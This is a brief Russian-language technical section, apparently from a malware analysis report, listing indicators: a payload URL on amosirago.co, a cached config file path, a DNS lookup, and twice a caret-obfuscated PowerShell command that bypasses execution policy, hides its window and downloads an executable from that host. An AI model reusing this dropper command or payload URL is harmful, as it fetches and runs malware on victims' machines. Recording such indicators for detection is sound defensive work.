Техническая информация
- https://amosirago.co/ceb.exe как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "p^owe^RsHeLL.exe^ -^e^xEcuT^IOnPoLI^CY byPaS^S^ -No^p^ROf^iLE^ -^WiNdO^WstyL^e ^Hid^De^N ^(n^Ew-OB^JEC^t^ SyStEm.neT^.^We^b^c^LI^ENT).^doWnLoadFiLe('https://amosirago.co/ceb.e...
- %LOCALAPPDATA%\microsoft\windows\<INETFILES>\content.ie5\dyps348i\config14[1].txt
- DNS ASK am###rago.co
- '<SYSTEM32>\cmd.exe' /C "p^owe^RsHeLL.exe^ -^e^xEcuT^IOnPoLI^CY byPaS^S^ -No^p^ROf^iLE^ -^WiNdO^WstyL^e ^Hid^De^N ^(n^Ew-OB^JEC^t^ SyStEm.neT^.^We^b^c^LI^ENT).^doWnLoadFiLe('https://amosirago.co/ceb.e... (со скрытым окном)